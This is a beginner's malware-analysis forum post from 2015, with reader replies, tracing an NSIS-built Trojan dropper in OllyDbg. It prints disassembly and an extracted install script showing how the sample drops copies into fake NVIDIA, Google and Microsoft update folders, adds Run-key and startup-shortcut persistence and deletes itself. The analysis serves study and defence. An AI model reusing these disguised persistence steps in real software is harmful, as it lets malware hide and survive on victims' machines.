首页
社区
课程
招聘
[原创]纯小白系列之病毒分析(一)
发表于: 2015-4-1 21:54 11910

[原创]纯小白系列之病毒分析(一)

2015-4-1 21:54
11910
首选先自我介绍一下吧,我在病毒分析方面纯小白!
此篇文章是自己第一次分析病毒,第一次写病毒分析报告!
此分析报告是前几天面试一家安全公司时需要上交的题目!
自己的基础方面:C/C++、逆向等有一定入门基础!所以打算自己边学边写一个病毒分析系列的教程吧,希望对那些和我一样的新手有所帮助吧!如有笔误或者分析有误时,大神们勿喷!

一、  名词解释
           母体:指病毒主文件(即2E6682932F826269B0F84A93AAB9E609.85A681D7)
           子体:指由母体从资源中释放出来的文件

二、  研究环境及分析工具
系统环境:虚拟机中的XP环境
研究工具:OD 、IDA、procexp(行为分析)、procmon、PEID等
分析人:Youngs

三、  行为分析
     1、 用OD加载母体程序,直接按F9运行时,在procexp中可以看到母体释放出一个子体daemonupd.exe格式的程序,并创建进程运行!如图一所示:

图一

  2、用PEID给母体查壳,显示为Nullsoft PiMP Stub [Nullsoft PiMP SFX] *,如下图所示

图二

因为不知道这个是什么壳,于是我百度一下,结果百度上给出的是以下回答:
不是特别的壳,只是用Nullsoft Installation System制作的安装程序。Nullsoft Installation System(NSIS)是一个把程序,数据和文档等,用Script 方式,制作成“安装程序”的软件。
只是它的母体只是一个用NSIS来制作的一个exe程序。

四、  调试分析
       1、打开ida加载母体程序后,可以看到一些重要的API和CALL,了解整个过程的操作流程。看了其伪代码大概知道是获取临时路径,然后操作文件相关。

       2、大致流程路线:


       3、用OD加载母体程序,首先是其母体程序的路径,如图三所示:

图三

然后获取完整路径,用“(即22)作为结束符判断,如图四所示:

图四

通过脚本程序(后面会介绍到脚本)获取零时文件:
0040588C  |.  56                  |PUSH ESI                                ; /TempName
0040588D  |.  8D45 08             |LEA EAX,DWORD PTR SS:[EBP+0x8]          ; |
00405890  |.  6A 00               |PUSH 0x0                                ; |Unique = 0x0
00405892  |.  50                  |PUSH EAX                                ; |Prefix="nsa"(此值是随时变化的)
00405893  |.  FF75 0C             |PUSH DWORD PTR SS:[EBP+0xC]             ; |Path="C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"
00405896  |.  0055 0A             |ADD BYTE PTR SS:[EBP+0xA],DL            ; |DL=9 此时"nsa"中的a+9=t 从而名字为"nsj"
00405899  |.  FF15 D8704000       |CALL DWORD PTR DS:[<&KERNEL32.GetTempFi>; \GetTempFileNameA
0040589F  |.  85C0                |TEST EAX,EAX
004058A1  |.  75 0D               |JNZ SHORT 2E668293.004058B0
004058A3  |.  85FF                |TEST EDI,EDI
004058A5  |.^ 75 D0               \JNZ SHORT 2E668293.00405877


然后我们会发现在C:\Documents and Settings\Administrator\Local Settings\Temp路径下会发现这样一个零时文件。执行完后回到那个调用CALL的位置:
因为不知道创建这个零时文件有什么作用,然后我们接着继续往下分析,会发现其回继续跳出回来主call,其实通过GetTempPathA就可以猜出是在上面的目录下进行操作的,如下图:

然后接着继续看,当看到下面的时候,我们会发现之前的分析没有啥意义了,个人理解为是在干扰分析用的又或者可以理解为一种壳吧。

004033A8  |. /74 7E               JE SHORT 2E668293.00403428
004033AA  |> |68 00A04200         PUSH 2E668293.0042A000                   ; /FileName="C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\nsj3.tmp"
004033AF  |. |FF15 44714000       CALL DWORD PTR DS:[<&KERNEL32.DeleteFile>; \DeleteFileA
004033B5  |.  56                  PUSH ESI                                 ; /Arg1
004033B6  |.  E8 B7F8FFFF         CALL 2E668293.00402C72                   ; \在路径C:\Documents and Settings\Administrator\Local Settings\Temp中创建nsd4.tmp


刚才分析的文件又重新删除掉了,并又创建了nsd4.tmp方式与之前一样!

跟着我们继续跟入CALL中,然后会发现这样一段,是在C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update目录下创建一下文件夹的方法,由于文件夹为null,所以没出现新文件夹。如下图:

下面这段代码是创建google下update的目录:
00402A0C  |.  83E1 0F       AND ECX,0xF
00402A0F  |.  C1F8 04       SAR EAX,0x4
00402A12  |.  FF348A        PUSH DWORD PTR DS:[EDX+ECX*4]        ; /Arg2
00402A15  |.  C1E0 0A       SHL EAX,0xA                          ; |
00402A18  |.  05 709B4000   ADD EAX,2E668293.00409B70            ; |ASCII "Google\Update"
00402A1D  |.  50            PUSH EAX                             ; |Arg1
00402A1E  |.  E8 65310000   CALL 2E668293.00405B88               ; [COLOR="red"]\创建CALL[/COLOR]


以下是在C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\路径下创建新文件d83665e11921a3e0525e1d4d9e1d04f1.exe

0040583D  /$  FF7424 04     PUSH DWORD PTR SS:[ESP+0x4]          ; /FileName
00405841  |.  FF15 78704000 CALL DWORD PTR DS:[<&KERNEL32.GetFil>; \GetFileAttributesA
00405847  |.  8BC8          MOV ECX,EAX
00405849  |.  6A 00         PUSH 0x0                             ; /hTemplateFile = NULL
0040584B  |.  41            INC ECX                              ; |
0040584C  |.  F7D9          NEG ECX                              ; |
0040584E  |.  1BC9          SBB ECX,ECX                          ; |
00405850  |.  23C8          AND ECX,EAX                          ; |
00405852  |.  51            PUSH ECX                             ; |Attributes=0
00405853  |.  FF7424 14     PUSH DWORD PTR SS:[ESP+0x14]         ; |Mode=CREATE_ALWAYS
00405857  |.  6A 00         PUSH 0x0                             ; |pSecurity = NULL
00405859  |.  6A 01         PUSH 0x1                             ; |ShareMode = FILE_SHARE_READ
0040585B  |.  FF7424 1C     PUSH DWORD PTR SS:[ESP+0x1C]         ; |Access = GENERIC_WRITE
0040585F  |.  FF7424 1C     PUSH DWORD PTR SS:[ESP+0x1C]         ; |FileName="C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\d83665e11921a3e0525e1d4d9e1d04f1.exe
00405863  |.  FF15 90704000 CALL DWORD PTR DS:[<&KERNEL32.Create>; \CreateFileA
00405869  \.  C2 0C00       RETN 0xC

如下图所示:是创建出来的程序

然后通过调用此call

创建进程,运行它
Call内代码如下:
004053C6  /$  55            PUSH EBP
004053C7  |.  8BEC          MOV EBP,ESP
004053C9  |.  83EC 10       SUB ESP,0x10
004053CC  |.  8D45 F0       LEA EAX,DWORD PTR SS:[EBP-0x10]
004053CF  |.  C705 A8244200>MOV DWORD PTR DS:[0x4224A8],0x44
004053D9  |.  50            PUSH EAX                             ; /pProcessInfo
004053DA  |.  33C0          XOR EAX,EAX                          ; |
004053DC  |.  68 A8244200   PUSH 2E668293.004224A8               ; |pStartupInfo = 2E668293.004224A8
004053E1  |.  50            PUSH EAX                             ; |CurrentDir => NULL
004053E2  |.  50            PUSH EAX                             ; |pEnvironment => NULL
004053E3  |.  50            PUSH EAX                             ; |CreationFlags => 0
004053E4  |.  50            PUSH EAX                             ; |InheritHandles => FALSE
004053E5  |.  50            PUSH EAX                             ; |pThreadSecurity => NULL
004053E6  |.  50            PUSH EAX                             ; |pProcessSecurity => NULL
004053E7  |.  FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; |CommandLine
004053EA  |.  50            PUSH EAX                             ; |ModuleFileName => NULL
004053EB  |.  FF15 D0704000 CALL DWORD PTR DS:[<&KERNEL32.Create>; \CreateProcessA
004053F1  |.  85C0          TEST EAX,EAX
004053F3  |.  74 0C         JE SHORT 2E668293.00405401
004053F5  |.  FF75 F4       PUSH DWORD PTR SS:[EBP-0xC]          ; /hObject
004053F8  |.  FF15 EC704000 CALL DWORD PTR DS:[<&KERNEL32.CloseH>; \CloseHandle
004053FE  |.  8B45 F0       MOV EAX,DWORD PTR SS:[EBP-0x10]
00405401  |>  C9            LEAVE
00405402  \.  C2 0400       RETN 0x4


运行后的程序如下图:


随后的代码中,直接关闭其句柄了:
代码:
00401E87  |> \FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; /hObject
00401E8A  |>  FF15 EC704000 CALL DWORD PTR DS:[<&KERNEL32.CloseH>; \CloseHandle


接着其创建注册表,操作过程用 可以查看到:


00402328  |.  53            PUSH EBX                             ; /pDisposition
00402329  |.  51            PUSH ECX                             ; |pHandle
0040232A  |.  8B0D 503F4200 MOV ECX,DWORD PTR DS:[0x423F50]      ; |
00402330  |.  83C9 02       OR ECX,0x2                           ; |
00402333  |.  53            PUSH EBX                             ; |pSecurity
00402334  |.  51            PUSH ECX                             ; |Access
00402335  |.  53            PUSH EBX                             ; |Options
00402336  |.  53            PUSH EBX                             ; |Class
00402337  |.  53            PUSH EBX                             ; |Reserved
00402338  |.  50            PUSH EAX                             ; |SubKey="Software\Microsoft\Windows\CurrentVersion\Run"
00402339  |.  57            PUSH EDI                             ; |hKey=HKEY_CURRENY_USER
0040233A  |.  C745 FC 01000>MOV DWORD PTR SS:[EBP-0x4],0x1       ; |
00402341  |.  FF15 20704000 CALL DWORD PTR DS:[<&ADVAPI32.RegCre>; \RegCreateKeyExA


紧接着会出现设置注册表的键值
0040238E  |> \50            PUSH EAX                             ; /BufSize=95
0040238F  |.  57            PUSH EDI                             ; |Buffer="C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\daemonupd.exe /app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
00402390  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-0x30]         ; |ValueType = REG_SZ
00402393  |.  53            PUSH EBX                             ; |Rserved = 0x0
00402394  |.  FF75 BC       PUSH DWORD PTR SS:[EBP-0x44]         ; |ValueName = "NvUpdService"
00402397  |.  FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; |hKey = OxDC
0040239A  |.  FF15 04704000 CALL DWORD PTR DS:[<&ADVAPI32.RegSet>; \RegSetValueExA


监控的操作为:

紧接着关闭注册表:
0040247C  |> \57            PUSH EDI                             ; /hKey
0040247D  |>  FF15 1C704000 CALL DWORD PTR DS:[<&ADVAPI32.RegClo>; \RegCloseKey



继续跟进,会发现在C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Update中创建一个空目录,

004015D2  |.  53            |PUSH EBX                            ; /pSecurity=0
004015D3  |.  57            |PUSH EDI                            ; |Path = "C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Update"
004015D4  |.  8A06          |MOV AL,BYTE PTR DS:[ESI]            ; |
004015D6  |.  881E          |MOV BYTE PTR DS:[ESI],BL            ; |
004015D8  |.  8845 0B       |MOV BYTE PTR SS:[EBP+0xB],AL        ; |
004015DB  |.  FF15 80704000 |CALL DWORD PTR DS:[<&KERNEL32.Creat>; \CreateDirectoryA


然后调用SHFileOperationA函数来复制d83665e11921a3e0525e1d4d9e1d04f1.exe并重命名为gupdate.exe:

004021CC  |.  50            PUSH EAX                             ; /Arg2
004021CD  |.  53            PUSH EBX                             ; |Arg1
004021CE  |.  8975 A4       MOV DWORD PTR SS:[EBP-0x5C],ESI      ; |
004021D1  |.  897D A8       MOV DWORD PTR SS:[EBP-0x58],EDI      ; |
004021D4  |.  8945 B6       MOV DWORD PTR SS:[EBP-0x4A],EAX      ; |
004021D7  |.  66:894D AC    MOV WORD PTR SS:[EBP-0x54],CX        ; |
004021DB  |.  E8 242D0000   CALL 2E668293.00404F04               ; \2E668293.00404F04
004021E0  |.  8D45 9C       LEA EAX,DWORD PTR SS:[EBP-0x64]
004021E3  |.  50            PUSH EAX
004021E4  |.  FF15 60714000 CALL DWORD PTR DS:[<&SHELL32.SHFileO>;  shell32.SHFileOperationA (把d83665e11921a3e0525e1d4d9e1d04f1.exe复制到\Application Data\Google\Update目录下 并把程序名改为gupdate.exe)


紧接着给gupdate.exe创建注册表,代码如下:
00402328  |.  53            PUSH EBX                             ; /pDisposition
00402329  |.  51            PUSH ECX                             ; |pHandle
0040232A  |.  8B0D 503F4200 MOV ECX,DWORD PTR DS:[0x423F50]      ; |
00402330  |.  83C9 02       OR ECX,0x2                           ; |
00402333  |.  53            PUSH EBX                             ; |pSecurity
00402334  |.  51            PUSH ECX                             ; |Access
00402335  |.  53            PUSH EBX                             ; |Options
00402336  |.  53            PUSH EBX                             ; |Class
00402337  |.  53            PUSH EBX                             ; |Reserved
00402338  |.  50            PUSH EAX                             ; |SubKey="Software\Microsoft\Windows\CurrentVersion\Run"
00402339  |.  57            PUSH EDI                             ; |hKey=HKEY_CURRENY_USER
0040233A  |.  C745 FC 01000>MOV DWORD PTR SS:[EBP-0x4],0x1       ; |
00402341  |.  FF15 20704000 CALL DWORD PTR DS:[<&ADVAPI32.RegCre>; \RegCreateKeyExA


接着设置其注册表的键值,代码如下:
0040238E  |> \50            PUSH EAX                             ; /BufSize=95
0040238F  |.  57            PUSH EDI                             ; |Buffer="C:\Documents and Settings\Administrator\Local Settings\Application Data\Google\Update\gupdate.exe /app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
00402390  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-0x30]         ; |ValueType = REG_SZ
00402393  |.  53            PUSH EBX                             ; |Rserved = 0x0
00402394  |.  FF75 BC       PUSH DWORD PTR SS:[EBP-0x44]         ; |ValueName = "Google Update"
00402397  |.  FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; |hKey = OxDC
0040239A  |.  FF15 04704000 CALL DWORD PTR DS:[<&ADVAPI32.RegSet>; \RegSetValueExA


接下来就是关闭注册表:

0040247C  |> \57            PUSH EDI                             ; /hKey
0040247D  |>  FF15 1C704000 CALL DWORD PTR DS:[<&ADVAPI32.RegClo>; \RegCloseKey


更换了目录,对C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows目录操作

004015D2  |.  53            |PUSH EBX                            ; /pSecurity
004015D3  |.  57            |PUSH EDI                            ; |Path = "C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows"
004015D4  |.  8A06          |MOV AL,BYTE PTR DS:[ESI]            ; |
004015D6  |.  881E          |MOV BYTE PTR DS:[ESI],BL            ; |
004015D8  |.  8845 0B       |MOV BYTE PTR SS:[EBP+0xB],AL        ; |
004015DB  |.  FF15 80704000 |CALL DWORD PTR DS:[<&KERNEL32.Creat>; \CreateDirectoryA


调用SHFileOperationA函数来复制d83665e11921a3e0525e1d4d9e1d04f1.exe并重命名为winupdate.exe:

004021CC  |.  50            PUSH EAX                             ; /Arg2
004021CD  |.  53            PUSH EBX                             ; |Arg1
004021CE  |.  8975 A4       MOV DWORD PTR SS:[EBP-0x5C],ESI      ; |
004021D1  |.  897D A8       MOV DWORD PTR SS:[EBP-0x58],EDI      ; |
004021D4  |.  8945 B6       MOV DWORD PTR SS:[EBP-0x4A],EAX      ; |
004021D7  |.  66:894D AC    MOV WORD PTR SS:[EBP-0x54],CX        ; |
004021DB  |.  E8 242D0000   CALL 2E668293.00404F04               ; \2E668293.00404F04
004021E0  |.  8D45 9C       LEA EAX,DWORD PTR SS:[EBP-0x64]
004021E3  |.  50            PUSH EAX
004021E4  |.  FF15 60714000 CALL DWORD PTR DS:[<&SHELL32.SHFileO>;  shell32.SHFileOperationA (把d83665e11921a3e0525e1d4d9e1d04f1.exe复制到\Application Data\Microsoft\Windows目录下 并把程序名改为winupdate.exe)


把其中的一个字符串装换为宽字符:

0040211B  |.  68 00040000   PUSH 0x400                           ; /WideBufSize = 400 (1024.)
00402120  |.  56            PUSH ESI                             ; |WideCharBuf => 2E668293.00409368
00402121  |.  6A FF         PUSH -0x1                            ; |StringSize = FFFFFFFF (-1.)
00402123  |.  FF75 D0       PUSH DWORD PTR SS:[EBP-0x30]         ; |StringToMap = "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\winupdate.lnk"
00402126  |.  BF 05400080   MOV EDI,0x80004005                   ; |
0040212B  |.  53            PUSH EBX                             ; |Options
0040212C  |.  53            PUSH EBX                             ; |CodePage
0040212D  |.  FF15 1C714000 CALL DWORD PTR DS:[<&KERNEL32.MultiB>; \MultiByteToWideChar


紧接着去搜索C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\daemonupd.exe"

00405527  |.  50            PUSH EAX                             ; /pFindFileData
00405528  |.  56            PUSH ESI                             ; |FileName="C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\daemonupd.exe"
00405529  |.  03DF          ADD EBX,EDI                          ; |
0040552B  |.  FF15 40714000 CALL DWORD PTR DS:[<&KERNEL32.FindFi>; \FindFirstFileA


然后就自己调用MoveFileA函数来重命名程序了,

0040165E  |.  57            PUSH EDI                             ; /NewName = "C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\daemonupd.exe"
0040165F  |.  56            PUSH ESI                             ; |ExistingName = "C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\d83665e11921a3e0525e1d4d9e1d04f1.exe"
00401660  |.  FF15 70704000 CALL DWORD PTR DS:[<&KERNEL32.MoveFi>; \MoveFileA


执行完上面代码后,则出现下图情况:


继续跟入,我们会发现,程序创建进程直接运行起daemonupd.exe

004053D9  |.  50            PUSH EAX                             ; /pProcessInfo
004053DA  |.  33C0          XOR EAX,EAX                          ; |
004053DC  |.  68 A8244200   PUSH 2E668293.004224A8               ; |pStartupInfo = 2E668293.004224A8
004053E1  |.  50            PUSH EAX                             ; |CurrentDir => NULL
004053E2  |.  50            PUSH EAX                             ; |pEnvironment => NULL
004053E3  |.  50            PUSH EAX                             ; |CreationFlags => 0
004053E4  |.  50            PUSH EAX                             ; |InheritHandles => FALSE
004053E5  |.  50            PUSH EAX                             ; |pThreadSecurity => NULL
004053E6  |.  50            PUSH EAX                             ; |pProcessSecurity => NULL
004053E7  |.  FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; |CommandLine = ""C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\daemonupd.exe" /app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
004053EA  |.  50            PUSH EAX                             ; |ModuleFileName => NULL
004053EB  |.  FF15 D0704000 CALL DWORD PTR DS:[<&KERNEL32.Create>; \CreateProcessA


关闭句柄,代码如下:
00402753  |> \FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; /hObject
00402756  |.  FF15 EC704000 CALL DWORD PTR DS:[<&KERNEL32.CloseH>; \CloseHandle


继续搜索以前的原有程序d83665e11921a3e0525e1d4d9e1d04f1.exe是否存在

00405521  |.  8D85 B8FEFFFF LEA EAX,DWORD PTR SS:[EBP-0x148]
00405527  |.  50            PUSH EAX                             ; /pFindFileData
00405528  |.  56            PUSH ESI                             ; |FileName="C:\Documents and Settings\Administrator\Local Settings\Application Data\NVIDIA Corporation\Update\d83665e11921a3e0525e1d4d9e1d04f1.exe"
00405529  |.  03DF          ADD EBX,EDI                          ; |
0040552B  |.  FF15 40714000 CALL DWORD PTR DS:[<&KERNEL32.FindFi>; \FindFirstFileA


继续检查2E6682932F826269B0F84A93AAB9E609.85A681D7是否存在,代用代码和上面一样
接着调用DeleteFileA来删除母体程序,由于我用OD已经加载了,所以删除失败,正常是可以自己删除母体程序的

004055A0  |.  57            |PUSH EDI                            ; /FileName
004055A1  |.  FF15 44714000 |CALL DWORD PTR DS:[<&KERNEL32.Delet>; \DeleteFileA


后面的代码都是对2B42CDC8B1EDBFEC23AA442F8F7EF3D9操作的,搜索目录、终止进程、关闭句柄,因为我用OD加载了 所以无法对其操作!
其代码如下:
004055D3  |> \8D85 B8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-0x148]
004055D9  |.  50            |PUSH EAX                            ; /pFindFileData
004055DA  |.  FF75 08       |PUSH DWORD PTR SS:[EBP+0x8]         ; |hFile
004055DD  |.  FF15 3C714000 |CALL DWORD PTR DS:[<&KERNEL32.FindN>; \FindNextFileA
004055E3  |.  85C0          |TEST EAX,EAX
004055E5  |.^ 0F85 52FFFFFF \JNZ 2E668293.0040553D
004055EB  |.  FF75 08       PUSH DWORD PTR SS:[EBP+0x8]          ; /hSearch
004055EE  |.  FF15 38714000 CALL DWORD PTR DS:[<&KERNEL32.FindCl>; \FindClose
……………………………………………………………………………………………………
004035AF  |.  894424 18     MOV DWORD PTR SS:[ESP+0x18],EAX
004035B3  |>  FF7424 18     PUSH DWORD PTR SS:[ESP+0x18]         ; /ExitCode
004035B7  \.  FF15 A4704000 CALL DWORD PTR DS:[<&KERNEL32.ExitPr>; \ExitProcess
004035BD  /$  A1 14904000   MOV EAX,DWORD PTR DS:[0x409014]
004035C2  |.  56            PUSH ESI
004035C3  |.  8B35 EC704000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Clo>;  kernel32.CloseHandle
004035C9  |.  83F8 FF       CMP EAX,-0x1
004035CC  |.  74 0A         JE SHORT 2E668293.004035D8
004035CE  |.  50            PUSH EAX                             ; /hObject => FFFFFFFF
004035CF  |.  FFD6          CALL ESI                             ; \CloseHandle
……………………………………………………………………………………………………


五、  继续分析daemonup.exe文件
用OD加载的时候会显示数据被压缩过,可能是加了某种壳吧!打乱了所有的顺序,用“删除模块分析”都没什么反应 ,由于水平有限暂到这里吧  
我们会发现无法正常双击去运行它,然后我又重新让母体程序运行起来,用Process Monitor会发现如下的情况


应该是一个远控木马程序,因为它不停的发包和接包!

六、  带着好奇心打开NSIS文件
   1、弄玩上面的,又百度了一下NSIS,在卡饭论坛上看到有这样的回答,说是可以用7z-zip解压一些文件,于是在虚拟机中我用7z解压打开了母体程序。我一个朋友也解压出来了,然后也跟着试试!看到如下信息:

图6
暂时百度后只知道nsis是执行脚本。
结合图一和图6,我们可以看到图6中的exe在图一中都没显示过,初步估计是操作很快,人眼无法识别出来,但是在我们动态调试的时候,显示有!
2、以文本文档的方式打开[NSIS].nsi文件,我们会发现正如百度知道所说,这里面全部是一些操作文件、注册表等的代码,部分代码如下:
Exec "$\"$INSTDIR\daemonupd.exe$\" /exit 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
  DeleteRegValue HKCU Software\Microsoft\Windows\CurrentVersion\Run $_0_
  DeleteRegValue HKCU Software\Microsoft\Windows\CurrentVersion\Run $_4_
  Sleep 1000
  Delete $INSTDIR\daemonupd.exe
  Delete $SMSTARTUP\$_2_.lnk
  Delete $LOCALAPPDATA\Microsoft\Windows\$_2_.exe
  Delete $LOCALAPPDATA\$_1_\$_3_.exe
  Quit
label_61:
  File d83665e11921a3e0525e1d4d9e1d04f1.exe
  Exec "$\"$INSTDIR\d83665e11921a3e0525e1d4d9e1d04f1.exe$\" /exit 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
  Sleep 2000
  WriteRegStr HKCU Software\Microsoft\Windows\CurrentVersion\Run $_0_ "$INSTDIR\daemonupd.exe /app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
  CreateDirectory $LOCALAPPDATA\$_1_
  CopyFiles /SILENT $INSTDIR\d83665e11921a3e0525e1d4d9e1d04f1.exe $LOCALAPPDATA\$_1_\$_3_.exe    ; $(LSTR_7)$LOCALAPPDATA\$_1_\$_3_.exe    ;  "Copy to "
  WriteRegStr HKCU Software\Microsoft\Windows\CurrentVersion\Run $_4_ "$LOCALAPPDATA\$_1_\$_3_.exe /app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
  CreateDirectory $LOCALAPPDATA\Microsoft\Windows
  CopyFiles /SILENT $INSTDIR\d83665e11921a3e0525e1d4d9e1d04f1.exe $LOCALAPPDATA\Microsoft\Windows\$_2_.exe    ; $(LSTR_7)$LOCALAPPDATA\Microsoft\Windows\$_2_.exe    ;  "Copy to "
  CreateShortCut $SMSTARTUP\$_2_.lnk $LOCALAPPDATA\Microsoft\Windows\$_2_.exe "/app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
  Delete $INSTDIR\daemonupd.exe
  Rename /REBOOTOK $INSTDIR\d83665e11921a3e0525e1d4d9e1d04f1.exe $INSTDIR\daemonupd.exe ;  $INSTDIR\d83665e11921a3e0525e1d4d9e1d04f1.exe->$INSTDIR\daemonupd.exe
  Exec "$\"$INSTDIR\daemonupd.exe$\" /app 2B42CDC8B1EDBFEC23AA442F8F7EF3D9"
  Delete $INSTDIR\d83665e11921a3e0525e1d4d9e1d04f1.exe
  Delete /REBOOTOK $EXEPATH


因为之前用OD调试过,会发现母体程序基本都是按照此代码来操作注册表和文件等的
好了,分析报告就到这里吧!
因为自己没有分析病毒的经验,也就是自己一步一步的跟进去找到相关的call去理解的!
第一次写这样的文档,也不是文科生,叙述没有条理,有些混乱!大家凑合看吧!有错误的地方也希望大家能指正,我也能多学习学习!
以后我会边工作边研究,也会把自己分析过的一些病毒,希望自己能对和我一样是纯小白的人有点帮助吧!
虽然目前我个人能力有限,但我会坚持边学边写这样类似系列的纯小白系列之病毒分析的文章的,希望和大家一起共同进步,一起加油努力吧!

纯小白系列未完待续……
Youngs的博客地址:http://youngs-rsr.blog.163.com/

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (20)
雪    币: 2664
活跃值: (3395)
能力值: ( LV13,RANK:1760 )
在线值:
发帖
回帖
粉丝
2
支持一下,态度值得肯定
2015-4-1 22:14
0
雪    币: 5467
活跃值: (1435)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
这个不错,学到好多东西了。
2015-4-1 22:23
0
雪    币: 65
活跃值: (27)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
4
mark。有空下载跟一遍
2015-4-1 22:32
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
5
谢谢安大大的支持啊,偶也是看你翻译的OD教程慢慢学的!我一定会坚持下来边学边写的……
2015-4-1 22:49
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
6
谢谢支持!以后有什么好的方法,也可以教教我啊!
2015-4-1 22:53
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
7
如有什么好的分析方法,希望你也可以教教我啊!
2015-4-1 22:55
0
雪    币: 596
活跃值: (449)
能力值: ( LV12,RANK:320 )
在线值:
发帖
回帖
粉丝
8
这头像 赞!
2015-4-2 02:59
0
雪    币: 11
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
还不错,希望楼主坚持到底!
2015-4-2 09:04
0
雪    币: 1318
活跃值: (248)
能力值: ( LV5,RANK:75 )
在线值:
发帖
回帖
粉丝
10
必须赞一个啊,我就跟着楼主学习下去
2015-4-2 09:10
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
11
evilkis牛 刚才看了一下你写的第一篇病毒分析文章,学了很多!也看到自己很多不足点!
2015-4-2 10:03
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
12
一定坚持写下去!
2015-4-2 10:05
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
13
我也是新手,以后相互学习吧
2015-4-2 10:06
0
雪    币: 225
活跃值: (268)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
14
继续分析daemonup.exe文件,这个是重点
2015-4-2 11:22
0
雪    币: 36
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
感谢楼主啊。。保存。。
2015-4-2 12:24
0
雪    币: 20
活跃值: (42)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
16
连上了一个域名的444,为什么不跟上去看看?
2015-4-4 09:31
0
雪    币: 461
活跃值: (319)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
17
恩 会继续跟的
2015-4-4 12:46
0
雪    币: 44
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
18
对新手有好处,学习了。
2015-4-4 13:03
0
雪    币: 78
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
前来学习,大牛膜拜。
2015-4-5 16:52
0
雪    币: 2907
活跃值: (1301)
能力值: ( LV12,RANK:215 )
在线值:
发帖
回帖
粉丝
20
王总,谦虚了,一起向群主学习
2015-4-5 18:07
0
雪    币: 36
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
写的不错,对于初学者很有帮助,谢谢~
2015-4-14 21:45
0
游客
登录 | 注册 方可回帖
返回
//